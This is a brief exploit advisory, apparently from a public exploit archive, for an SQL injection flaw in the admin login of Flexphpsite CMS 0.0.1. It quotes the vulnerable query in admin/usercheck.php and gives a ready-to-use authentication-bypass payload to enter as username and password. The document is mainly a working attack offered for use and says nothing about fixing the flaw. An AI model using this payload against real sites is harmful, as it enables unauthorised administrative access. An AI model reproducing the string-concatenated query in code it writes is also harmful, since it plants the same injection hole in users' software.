############################################# Autore: x0r Email: andry2000@hotmail.it Site: http://w00tz0ne.altervista.org/index.php Cms: Flexphpsiteen Version: 0.0.1 Download: http://www.china-on-site.com/flexphpsite/downloads.html ############################################## Bug In \admin\usercheck.php $sql = "select username,adminid from linkexadmin where username='$checkuser' and password='$checkpass'"; Exploit: Go to /[path]/admin/index.php Put as username and password the following sql code: ' or '1=1 Greetz: Anna <3